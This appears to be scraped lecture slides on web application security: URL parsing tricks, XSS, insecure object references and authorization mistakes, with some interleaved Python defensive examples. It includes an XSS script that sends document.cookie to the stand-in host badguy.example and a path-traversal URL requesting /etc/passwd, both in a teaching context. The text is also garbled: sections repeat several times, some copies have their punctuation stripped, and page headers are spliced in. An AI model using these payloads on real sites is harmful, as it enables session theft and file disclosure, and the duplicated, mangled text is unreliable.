Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 10: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 11: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUR OUTPUTS

XSS attacks in general

• Attack typically on (another) user of the web app
• Attacker tricks app into displaying malicious code
  • typically script code

Many possible aims

• display random images, popup windows
• change page contents, e.g. alter bank account number
• session hijacking: steal session cookies

Session hijacking with XSS

[Picture from Innocent Code]

Example injected script:

<script>
document.location.replace("http://www.badguy.example/steal.php?" + "what=" + document.cookie)
</script>

• redirects victim's browser to attacker's site, passing the cookie
• might also pass the currently visited web page
  • then attacker's server can issue a redirect back again

Reflected XSS

Reflected XSS occurs when injected malicious code isn't stored in the server but is immediately displayed in the visited page. Suppose

http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc

dynamically makes HTML embedding title directly:

<h1>Man GCC</h1>

An attacker could use this with a malicious input

title=<script>...</script>&program=gcc

which, e.g., steals a cookie.

Exercise: Explain how this attack works in practice.

XSS Solutions

Input processing is tricky: need to understand data flow through the app, quoting, encoding, values passed to/from functions, databases, etc. Hence output filtering.

Plain output: HTML encoding

• Stored data values need to be encoded to represent in HTML (e.g. < converted to &lt;, etc.)

Marked up output: complex filtering

• Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.

Marked up output: DSL

• A better approach: use a dedicated syntax, convert to a restricted subset of HTML
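The three output strategies above, side by side, as an added example that is not the lecture's code: the manpage-style title rendering, the function names and the tiny markup syntax (*bold*, _emphasis_) are assumptions. The first function is the vulnerable concatenation from the reflected-XSS slide; the second HTML-encodes the value; the third shows the DSL approach, where the input is never treated as HTML at all, so the "which tags are risky" question never has to be answered.

```python
"""Output filtering for XSS: encode plain values, and render marked-up
text from a dedicated syntax rather than from HTML.

Added example (not from the lecture). The function names and the *bold*
/ _emphasis_ mini-syntax are assumptions for illustration.
"""
import html
import re


def render_title_unsafe(title):
    """The slide's flaw: the title parameter is pasted straight into HTML,
    so any tag in it becomes live markup in the victim's browser."""
    return "<h1>%s</h1>" % title


def render_title(title):
    """Plain output: HTML-encode the value. quote=True also encodes ' and ",
    which keeps the same helper safe inside attribute values."""
    return "<h1>%s</h1>" % html.escape(title, quote=True)


# The DSL: only these two markers are ever turned into HTML.
_BOLD = re.compile(r"\*([^*\n]+)\*")
_EM = re.compile(r"_([^_\n]+)_")


def render_markup(text):
    """Marked-up output via a DSL.

    Every character is HTML-encoded first, then only our own markers are
    rewritten into a restricted subset of HTML (<b>, <i>, <br>). Anything
    that looked like a tag or an attribute in the input therefore reaches
    the page as literal text, which is why this is less flaky than trying
    to filter HTML tag by tag.
    """
    encoded = html.escape(text, quote=True)
    encoded = _BOLD.sub(r"<b>\1</b>", encoded)
    encoded = _EM.sub(r"<i>\1</i>", encoded)
    return encoded.replace("\n", "<br>")


if __name__ == "__main__":
    tag_in_title = "<script>x</script>"
    print(render_title_unsafe(tag_in_title))   # tag is live: vulnerable
    print(render_title(tag_in_title))          # tag is text: safe
    print(render_markup("Use *gcc -Wall* for <all> warnings"))
```

Because encoding happens before the marker rewrite, a marker inside an encoded entity cannot be produced by the input (html.escape never emits * or _), so the output is always well-formed HTML drawn from the allowed subset.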

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction

A "cool" PHP script, showhtml.php:

• take a plain HTML file
• wrap it with navigation links, site style
• convert the internal links to reference back to the wrapped version

Embarrassing PHP blunders

http://research.site.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%25passwd

• remote users can visit any file on the system
• mistake motivates defence-in-depth
  • http server should not serve up any file
  • use internal web server config (separate apps)
  • and external OS config (e.g. nobody user, chroot)

Authorization and object access

What was the problem here?

• the app developer (implicitly) authorized users to read documentation files he had created
• project was open source, no need for logins
• app contained no paths to files outside the project
• so no explicit authorization code was written

• but PHP code didn't check the filename returned
• showhtml.php provided access to server objects
• input validation only checked for file existence

There should have been a re-authorization step. A well-written app should only allow access to its own resources.

Looking at anyone's bank account

<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>

Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account"

Solutions for object referencing

Re-validate

• Check authorization again
• Obvious solution, but duplicates effort

Add a data indirection

• Session-specific server-side array of account nos:

<option value="1">12345678901</option>
<option value="2">12346543210</option>

• Similarly for file access:

http://research.site.ed.ac.uk/showhtml.php?file=1#Introduction

for many files, a hash table or database could be used
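The data-indirection solution for both the bank-account form and the showhtml.php file parameter, as an added example that is not the lecture's or either book's code: the session table structure, the DOC_ROOT location and the sample account numbers taken from the slide are assumptions. The client only ever sees small indexes into a per-session table built from objects the user is entitled to; anything else submitted, including a raw account number or a path, resolves to nothing. The file side also keeps the defence-in-depth check that a resolved path must stay under the document root.

```python
"""Indirect object references: opaque per-session indexes instead of
account numbers or file paths in the HTML.

Added example (not from the lecture). The SessionRefs layout, DOC_ROOT
and the account numbers used in __main__ are assumptions.
"""
import os

DOC_ROOT = "/srv/research-site/docs"  # assumed home of the project's own HTML files


def is_within(base, path):
    """True if path lies under base after normalisation (no '..' escapes)."""
    base = os.path.abspath(base)
    path = os.path.abspath(path)
    return os.path.commonpath([base, path]) == base


class SessionRefs:
    """Per-session table mapping small indexes to server-side objects.

    Build it after authentication from the objects this user may access;
    authorization is then implicit in table membership and does not have
    to be re-derived on every request.
    """

    def __init__(self, owned_accounts, allowed_files):
        self._accounts = dict(enumerate(owned_accounts, start=1))
        self._files = dict(enumerate(allowed_files, start=1))

    def account_options(self):
        """<option> elements exposing the index, not the account number."""
        return "".join('<option value="%d">%s</option>' % (i, acct)
                       for i, acct in self._accounts.items())

    def resolve_account(self, value):
        """Map a submitted value back; anything not in the table is refused."""
        try:
            return self._accounts[int(value)]
        except (ValueError, KeyError):
            return None

    def resolve_file(self, value):
        """Map file=<index> back to a path confined to DOC_ROOT."""
        try:
            rel = self._files[int(value)]
        except (ValueError, KeyError):
            return None
        path = os.path.join(DOC_ROOT, rel)
        # Defence in depth: a bad table entry still cannot escape the root.
        return path if is_within(DOC_ROOT, path) else None


if __name__ == "__main__":
    refs = SessionRefs(["12345678901", "12346543210"], ["release/Userman.html"])
    print(refs.account_options())
    print(refs.resolve_account("2"), refs.resolve_account("12346543210"))
    print(refs.resolve_file("1"), refs.resolve_file("../../etc/passwd"))
```

The two resolve methods are where the "17-year geek" attack and the /etc/passwd request both die: the submitted value is only ever a key into a table the server built, so there is no server object it can name that the session was not already granted.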

Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified

<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText">
</textarea>
</form>

Solution: add a MAC constructed with a server-side secret key

<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

Or could encrypt the pagename.

Other authorization mistakes

Assuming requests occur in proper order

• For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
• only checking authorization on the first step

Authorization by obscurity

• Supposing that because a web page is not linked to from the main site, only people who are given it will be able to reach it

http://www.myserver.com/secretarea/privatepaper.pdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questions

URLs

• Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output to protect your users?

XSS

• Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references

• Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts:

• Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley 2004

• The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press 2012

as well as the named RFCs.


Fragment identifier

#lastsection

- Interpretation depends on client, resource type
- in practice: anchor names in HTML elements

- Not intended to be sent to server
- Recent use: store client-side state while browsing
  - can be changed without page reload
  - easily bookmarked, shared
  - e.g. map locations

Exercise: Find some uses of fragments on web pages and servers. See what happens if they are sent to the server.

Metacharacters

- Some punctuation characters are not allowed
- e.g. [ ] $ & ( ) =

- These are URL encoded with percent-ASCII hex
- e.g. %2F encodes /, %25 encodes %

The RFC does not specify a fixed mapping, and browsers try to interpret as many user inputs as possible.

E.g. examples like http://%65xample.%63om may work in some browsers but not others. Some browsers will canonicalize the authority part of the URL, then even try a search (foo.com, www.foo.com, ...).

The RFCs are not always followed.

Non-ASCII text encodings in URLs

- Original standards did not allow for non-ASCII text
- but clearly desirable for non-English text
- RFC 3492 introduced Punycode to allow behind-the-scenes DNS lookup
- DNS lookup: xn--[US-ASCII]-[Unicode]
- Browser display: Unicode part

Extension of 38 characters to 100,000 glyphs allowed many homograph attacks

- pea.com has 5 identical-looking Cyrillic chars
- there are non-slash characters that look like /
- some attacks not easily prevented by DNS registrars

We have (puny) browser/search engine defences for this. Moral: probably better to stick with ASCII.

Overall consequences

Parsing URLs: more complicated than one might hope

- better to use well-tested libraries than ad hoc code

But for output, want to be very careful

- especially if URLs are made from user (attacker) input
- should canonicalize, then filter/reformat
- filter especially on the scheme and authority

Overall consequences: eyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web app developers.

http://example.com&gibberish=1234@167772161/

http://example.com\@coredump.cx/

http://example.com;.coredump.cx/

Which server is visited by each of these URLs?

Exercise: Try (carefully) visiting these URLs, or others similar. Try asking some non-CS friends whose servers URLs like ‘www.barclays.banking.com’ go to.

Examples from The Tangled Web
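The "canonicalize, then filter on scheme and authority" advice above, applied to the slide's own trick URLs, as an added example (not code from the lecture). The allowlist, the function names and the rule that userinfo ends at the last '@' (RFC 3986) are assumptions for illustration; IPv6 literals are not handled.

```python
"""Canonicalise a URL, then filter on scheme and authority (added example)."""
import ipaddress
from typing import Optional
from urllib.parse import unquote, urlsplit, urlunsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"example.com"}          # assumed allowlist for this example


def canonical_host(url: str) -> Optional[str]:
    """Return the host an RFC 3986 parser would connect to, in canonical form
    (percent-decoded, lowercase, decimal IP as dotted quad, IDNA ASCII), or None."""
    netloc = urlsplit(url).netloc
    # userinfo ends at the LAST '@': 'example.com&gibberish=1234@167772161'
    # therefore has host '167772161', not 'example.com'
    _userinfo, _at, hostport = netloc.rpartition("@")
    host = hostport.split(":", 1)[0]                  # drop an explicit port
    host = unquote(host).rstrip(".").lower()          # %65xample.%63om -> example.com
    if not host:
        return None
    if host.isdigit():                                # bare decimal address
        try:
            return str(ipaddress.ip_address(int(host)))   # 167772161 -> 10.0.0.1
        except ValueError:
            return None
    try:                                              # Unicode labels -> xn--... (RFC 3492)
        return host.encode("idna").decode("ascii")
    except UnicodeError:
        return None


def canonical_url(url: str) -> Optional[str]:
    """Canonicalise, filter on scheme and host, then reformat: return the
    rebuilt scheme://host/path?query#fragment, or None if rejected."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return None
    host = canonical_host(url)
    if host is None or host not in ALLOWED_HOSTS:
        return None
    return urlunsplit((scheme, host, parts.path or "/", parts.query, parts.fragment))


if __name__ == "__main__":
    samples = [                                       # constructed sample inputs
        "http://example.com/",
        "http://%65xample.%63om/",
        "http://example.com&gibberish=1234@167772161/",
        "http://example.com\\@coredump.cx/",
        "http://example.com;.coredump.cx/",
        "http://p\u0435a.com/",                       # Cyrillic 'е': homograph of pea.com
    ]
    for u in samples:
        print(f"{u:48} host={canonical_host(u)!r:28} accepted={canonical_url(u)!r}")
```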

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUR OUTPUTS

XSS attacks in general

- Attack typically on (another) user of the web app
- Attacker tricks app into displaying malicious code
  - typically script code

Many possible aims

- display random images, popup windows
- change page contents, e.g. alter bank account number
- session hijacking: steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script:

<script>
document.location.replace("http://www.badguy.example/steal.php"
    + "?what=" + document.cookie)
</script>

- redirects victim’s browser to attacker's site, passing cookie
- might also pass currently visited web page
- then attacker's server can issue a redirect back again

Reflected XSS

Reflected XSS occurs when injected malicious code isn’t stored in the server but is immediately displayed in the visited page. Suppose

http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc

dynamically makes HTML embedding title directly:

<h1>Man GCC</h1>

An attacker could use this with a malicious input

title=<script>...</script>&program=gcc

which e.g. steals a cookie.

Exercise: Explain how this attack works in practice.

XSS Solutions

Input processing: tricky, need to understand data flow through app, quoting/encoding passed to/from functions, databases, etc. Hence: output filtering.

Plain output: HTML encoding

- Stored data values need to be encoded to represent in HTML (e.g. < converted to &lt;, etc.)

Marked up output: complex filtering

- Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.

Marked up output: DSL

- A better approach: use a dedicated syntax, convert to a restricted subset of HTML
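Output filtering for the reflected-XSS case above, as an added example (not code from the lecture): the vulnerable rendering of the manpage.php title beside its HTML-encoded form, plus a tiny DSL of the kind the last bullet describes. The render_* function names and the *bold* syntax are assumptions for illustration.

```python
"""Output filtering: HTML encoding and a restricted markup DSL (added example)."""
import html
import re
from urllib.parse import parse_qs, urlsplit


def title_from_url(url: str) -> str:
    """Extract the 'title' query parameter as the server receives it."""
    return parse_qs(urlsplit(url).query).get("title", [""])[0]


def render_vulnerable(title: str) -> str:
    """The flaw on the slide: untrusted text is embedded directly in HTML."""
    return f"<h1>{title}</h1>"


def render_escaped(title: str) -> str:
    """Plain output: HTML-encode the value so markup characters lose meaning."""
    return f"<h1>{html.escape(title, quote=True)}</h1>"


def render_attribute(value: str) -> str:
    """quote=True also encodes '\"', so a value cannot close the attribute it sits in."""
    return f'<input type="text" name="title" value="{html.escape(value, quote=True)}">'


_BOLD = re.compile(r"\*([^*\n]+)\*")          # the whole DSL: *text* means bold


def render_markup(text: str) -> str:
    """Marked-up output via a DSL: escape EVERYTHING first, then translate only
    our own syntax into a restricted HTML subset, so the only tags in the
    result are the ones this function emits."""
    return _BOLD.sub(r"<b>\1</b>", html.escape(text, quote=True))


if __name__ == "__main__":
    url = "http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc"
    print(render_escaped(title_from_url(url)))
    print(render_vulnerable("<script>...</script>"))   # script reaches the page
    print(render_escaped("<script>...</script>"))      # shown as text instead
    print(render_markup("*Man* GCC <b>not a tag</b>"))
```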

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

http://researchsite.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction

A “cool” PHP script: showhtml.php

- take a plain HTML file
- wrap it with navigation links, site style
- convert the internal links to reference back to the wrapped version

Embarrassing PHP blunders

http://researchsite.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%25passwd

- remote users can visit any file on the system
- mistake motivates defence-in-depth
  - http server should not serve up any file
  - use internal web server config (separate apps)
  - and external OS config (e.g. nobody user, chroot)

Authorization and object access

What was the problem here?

- the app developer (implicitly) authorized users to read documentation files he had created
  - project was open source, no need for logins
  - app contained no paths to files outside the project
  - so no explicit authorization code was written

- but the PHP code didn’t check the filename returned
  - showhtml.php provided access to server objects
  - input validation only checked for file existence

There should have been a re-authorization step. A well-written app should only allow access to its own resources.

Looking at anyone’s bank account

<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>

Example from Innocent Code, based on a Norwegian newspaper story about a “17-year-old geek able to view anyone’s bank account”.

Solutions for object referencing

Re-validate

- Check authorization again
- Obvious solution, but duplicates effort

Add a data indirection

- Session-specific server-side array of account nos.

<option value="1">12345678901</option>
<option value="2">12346543210</option>

- Similarly for file access

http://researchsite.ed.ac.uk/showhtml.php?file=1#Introduction

for many files, a hash table or database could be used
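The data-indirection solution for both the account list and the showhtml.php file parameter, as an added example (not code from the lecture). The Session class and the function names are assumptions; a real app would keep the table in its session store.

```python
"""Session-specific indirection for object references (added example)."""
from typing import Dict, List, Optional


class Session:
    """Per-user server-side state (stand-in for a real session store)."""

    def __init__(self) -> None:
        # kind ("account", "file", ...) -> {issued reference -> real object}
        self.refs: Dict[str, Dict[str, str]] = {}


def issue_refs(session: Session, kind: str, objects: List[str]) -> List[str]:
    """Record the objects this user may touch and hand out small indices
    ('1', '2', ...) that only mean something inside this session."""
    table = {str(i): obj for i, obj in enumerate(objects, start=1)}
    session.refs[kind] = table
    return list(table)


def account_options(session: Session, accounts: List[str]) -> str:
    """Build the <select> options: the value is the index, the label the number."""
    refs = issue_refs(session, "account", accounts)
    return "\n".join(f'<option value="{r}">{a}</option>' for r, a in zip(refs, accounts))


def resolve(session: Session, kind: str, ref: str) -> Optional[str]:
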